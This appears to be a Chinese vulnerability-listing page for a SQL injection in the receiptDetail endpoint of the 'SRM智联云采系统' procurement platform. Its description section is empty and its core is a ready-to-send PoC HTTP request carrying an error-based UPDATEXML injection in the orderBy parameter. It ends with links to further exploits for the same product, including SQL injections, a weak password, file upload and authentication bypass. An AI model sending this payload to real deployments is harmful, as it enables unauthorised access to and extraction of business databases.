SRM智联云采系统 receiptDetail 存在sql注入

漏洞描述

PoC代码

GET /adpweb/api/srm/delivery/receiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT('1',CONCAT('euzmzzgonz',%20'-'),%20'wvgccfjtpe')%2C3521%29%29 HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Cookie: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.106 Safari/537.36

相关漏洞推荐

• POC 智互联SRM智联云采系统 statusList SQL注入漏洞
• SRM智联云采系统 statusList 存在sql注入
• POC SRM智联云采系统 quickReceiptDetail 存在sql注入
• 智互联(深圳)科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞
• POC 智互联SRM智联云采系统 inquiry/getSuppliers SQL注入漏洞
• SRM智联云采系统 /adpweb/druid/submitLogin 弱口令漏洞
• SRM智联云采系统sql注入
• 智互联SRM智联云采系统 testService SQL注入漏洞
• POC 智互联SRM智联云采系统 receiptDetail SQL注入漏洞
• 智互联SRM智联云采系统任意文件上传漏洞
• POC 智互联SRM智联云采系统 quickReceiptDetail SQL注入漏洞
• SRM智联云采系统-存在身份认证绕过漏洞
• 智互联SRM智联云采系统 autologin 权限绕过漏洞